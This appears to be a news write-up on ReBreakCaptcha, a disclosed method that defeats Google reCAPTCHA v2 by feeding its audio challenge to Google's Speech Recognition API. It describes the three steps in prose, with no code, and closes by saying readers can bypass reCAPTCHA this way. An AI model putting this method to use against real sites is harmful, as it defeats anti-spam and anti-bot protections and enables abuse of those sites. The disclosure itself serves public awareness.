A researcher has discovered a “logic vulnerability” that allowed him to create a Python script that is fully capable of bypassing Google’s reCAPTCHA fields using its another service, the Speech Recognition API.
The researcher has gone online only by the name of East-EE. He has released proof=of-concept code on GitHub.
East-EE discovered this vulnerability in 2016, and named it as ReBreakCaptcha. He said that the vulnerability was still unpatched.
The proof-of-concept code allows attackers to automate the process of bypassing reCAPTCHA fields, currently used on millions of sites to keep out spam bots.
ReBreakCaptcha works in three stages :
1. Audio Challenge – Getting the correct challenge type.
2. Recognition – Converting the audio challenge audio and sending it to Google’s Speech Recognition API.
3. Verification – Verifying the Speech Recognition result and bypassing the ReCaptcha.
Stage 1 Audio Challenge
The challenge contains an audio recording, The user is requested to enter the digits that are heard. This attack only works on Google reCAPTCHA v2, the current version of the reCAPTCHA service.
When clicking the “I’m not a robot” checkbox of ReCaptcha v2, we are often presented with the following popup :
In addition, older browsers with no audio playback support, one can download audio challenge in one click. The audio file will be downloaded in MP3.
Instead of an audio challenge, rather you get an another challenge. That is text challenge which displays different texts on pop up to select. We can also divert this step to audio challenge by clicking on refresh button.
Stage 2 Recognition
Download the audio file and send it to Google Speech Recognition API. Before doing so, convert it to a ‘wav’ format which is requested by Google’s Speech Recognition API.
There is a great Python library named SpeechRecognition for performing speech recognition, with support for several engines and APIs, online and offline.
After the library implementation of Google Speech Recognition API, the Speech Recognition will send us back the result in a string (e.g. ‘25143’).
Stage 3 Verification
Finally, Copy-paste the output string from Stage 2 into the textbox, and click ‘Verify’ on the ReCaptcha widget.
As a result, we semi-automatically used Google’s Services to bypass another service of its own.
Therefore, you can sucessfully bypass reCAPTCHA with above easy methods.
Furthermore, Google is working on reCAPTCHA v3, which needs minimal user interaction and is currently referred to as Invisible reCapTCHA.